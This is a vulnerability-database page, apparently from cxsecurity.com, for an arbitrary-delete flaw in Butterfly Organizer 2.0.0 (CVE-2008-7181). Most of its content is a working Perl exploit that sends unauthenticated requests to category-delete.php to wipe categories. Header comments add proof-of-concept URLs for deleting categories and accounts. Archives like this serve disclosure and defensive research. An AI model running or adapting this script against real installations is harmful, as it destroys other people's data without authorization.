Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Butterfly Organizer 2.0.0 Arbitrary Delete (Category/Account) Exploit
2009-09-08 / 2009-09-09
Credit:
Stack
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-7181
CWE:
CWE-264
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
#!/usr/bin/perl -w # Butterfly Organizer 2.0.0 <= Arbitrary Delete (Category/Account) # poc for del Ctegory : http://localhost/organizer/category-delete.php?tablehere=[NAME OF CATEGORY]&is_js_confirmed=1 # poc for del Account : http://localhost/organizer//delete.php?id=[id of account]&mytable=[NAME OF CATEGORY] ######################################## #[*] Founded & Exploited by : Stack ######################################## # SIMPLE EXPLOIT WITH PERL system("color f"); print "\t\t############################################################\n\n"; print "\t\t# Butterfly Organizer 2.0.0 <= Arbitrary Delete #\n\n"; print "\t\t# ( Category / Account ) #\n\n"; print "\t\t# by Stack #\n\n"; print "\t\t############################################################\n\n"; ######################################## #----------------------------------------------------------------------------# ######################################## use LWP::UserAgent; die "Usage: perl $0 http://victim.com/path/\n" unless @ARGV; print "\n[!] Category name : "; chomp(my $cat=<STDIN>); $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . "/category-delete.php?tablehere=".$cat."&is_js_confirmed=1"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /$cat/) { print "\n[+] Exploit failed \n";}else{ print "\nBrought to you by v4-team.com...\n"; print "\n[+] Category Deleted\n";} ######################################## #------------------- Exploit exploited by Stack --------------------# ########################################
Referencje:
http://xforce.iss.net/xforce/xfdb/43067
http://www.securityfocus.com/bid/29703
http://www.milw0rm.com/exploits/5800
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top